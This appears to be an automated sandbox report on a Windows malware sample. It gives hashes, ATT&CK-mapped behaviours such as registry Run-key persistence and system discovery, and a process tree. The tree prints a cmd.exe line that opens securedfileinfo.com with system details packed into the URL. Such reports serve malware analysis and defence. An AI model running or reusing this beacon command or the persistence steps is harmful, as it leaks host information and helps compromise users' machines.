a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
27/11/2022, 02:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097.exe
Size

143KB
MD5

547c8451955b15ff34c32197d92094b2
SHA1

46d8c4b205f61a2dcee15b5c7da1402731597335
SHA256

a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097
SHA512

4bd0ccb03cd95ba36f26d461bc0a582e9fa6e3ffc7cd7fe91604119ae01141bc4f736da26aa17d87e06161ba6d45fb2a72e2b9e7a051a2bfb32926c168746302
SSDEEP

3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45Dn:pe9IB83ID5T

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\3ce61a17-4daf-4b83-ac81-344115b92c1c.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221127214315.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4620	msedge.exe
4620	msedge.exe
520	msedge.exe
520	msedge.exe
3708	identity_helper.exe
3708	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
520	msedge.exe
520	msedge.exe
520	msedge.exe
520	msedge.exe
520	msedge.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1652	a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097.exe
520	msedge.exe
520	msedge.exe
520	msedge.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1652	a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1652 wrote to memory of 2724	1652	a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097.exe	82
PID 1652 wrote to memory of 2724	1652	a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097.exe	82
PID 1652 wrote to memory of 2724	1652	a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097.exe	82
PID 2724 wrote to memory of 520	2724	cmd.exe	84
PID 2724 wrote to memory of 520	2724	cmd.exe	84
PID 520 wrote to memory of 2296	520	msedge.exe	86
PID 520 wrote to memory of 2296	520	msedge.exe	86
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 728	520	msedge.exe	88
PID 520 wrote to memory of 4620	520	msedge.exe	89
PID 520 wrote to memory of 4620	520	msedge.exe	89
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91
PID 520 wrote to memory of 3876	520	msedge.exe	91

C:\Users\Admin\AppData\Local\Temp\a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097.exe
"C:\Users\Admin\AppData\Local\Temp\a29ba458d87ded87e7f67a880db2be3859ce1444501c2bcd4474721d86fa2097.exe"
1⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5301121^&rsn=plde^&details=^|v6.2.9200x64sp0.0ws^|tt32^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://securedfileinfo.com/404.jsp?chid=5301121&rsn=plde&details=|v6.2.9200x64sp0.0ws|tt32|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p1
    3⤵
    - Adds Run key to start application
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdb6fc46f8,0x7ffdb6fc4708,0x7ffdb6fc4718
      4⤵
      PID:2296
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
      4⤵
      PID:728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
      4⤵
      PID:3876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
      4⤵
      PID:2896
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
      4⤵
      PID:4300
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4880 /prefetch:8
      4⤵
      PID:736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
      4⤵
      PID:3672
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4704 /prefetch:8
      4⤵
      PID:920
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
      4⤵
      PID:4504
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
      4⤵
      PID:4344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6316 /prefetch:8
      4⤵
      PID:4268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:2704
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff676725460,0x7ff676725470,0x7ff676725480
        5⤵
        
        PID:740
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6316 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3708
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
      4⤵
      PID:788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4464 /prefetch:8
      4⤵
      PID:4480
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2064,1817102384845824495,228402269997653409,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:8
      4⤵
      PID:4784

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
f2080851a6780703a0f3764645202ce1

SHA1
6e16ec7fe0404b0fe43ebd271ca47ffba9fc9588

SHA256
d3969401d4fc819669b9ce997251cc41d4883a31c4f43271b088944fadce3a83

SHA512
50e5661d1b5c66073c34d164b49733d7c1c1d7b2782611596646b60dae81321c5c92f9e64dce980cea8306b29db6136e582dcc07f1a951580c1f9f4d69643121

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4

Filesize
472B

MD5
9f6cc8d3fe9092a6d3901e873a87fd87

SHA1
2e0aac117a4cc57596efb3d6f6624c269f94b031

SHA256
e73982e62b92abac3d15b161f4525448cc2bc8b9bacefdcbfc6f87b74ec372e4

SHA512
9736a099967d7ad595439768e45c633ff7d34de92f7cb0c19cd3d4590c4a6dd4fedfcd1b5617c81652e61f4ffe919057507f622f4c6d8d626cfc40234ad2c757

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
724B

MD5
f569e1d183b84e8078dc456192127536

SHA1
30c537463eed902925300dd07a87d820a713753f

SHA256
287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413

SHA512
49553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
6b0d18dbc7a5cc71f80fee498a8c7483

SHA1
57403c5ae26725a44bab77d83df74b1a109311d7

SHA256
e61b4d40ea136e5928afefaa0b00a0ba019e89f0c187008e5c9104422b7b6850

SHA512
91bef0816d60cb69639358bb467d6ca554efcacfaa63404ac5456ca6710a572e8be5bec2b3a35fc230a4fad047ddb76f32f844beebd58fcab9be41a08693dd4c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4

Filesize
402B

MD5
67c08d1ac44ab0690a46bee390fe330a

SHA1
1da300eead5ceff863d2ae7d91236899bd8fe811

SHA256
2018fc5b31ce732526b755a2c9f66224211cf7cacce2f40513ae06cc7461166e

SHA512
58aceb16e41376adb24f68d365d13eb8c1793f3c3930298bd5a7cc5e453a4e221f0ab7fc9fd823637267a8c943aa1da2c7ab207083140d60042dedf515f01117

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

Filesize
392B

MD5
3c9e687e8930495331f44f8178671a58

SHA1
3c9ed5c84bd8bd84060a57e3905db29643fc5daa

SHA256
fbb52003e1f3cad8ff24dc46740b838f649a122f28627ba9dd137a76e9d110f4

SHA512
feaf515ea0bc2e43025d1af6cda2a52438881286e84bc7794ae5c5f2544e9654becb2fe24763094b47d435518dddea2f6ba54fceeabb3d2d3a8afe393f484857

Download Submit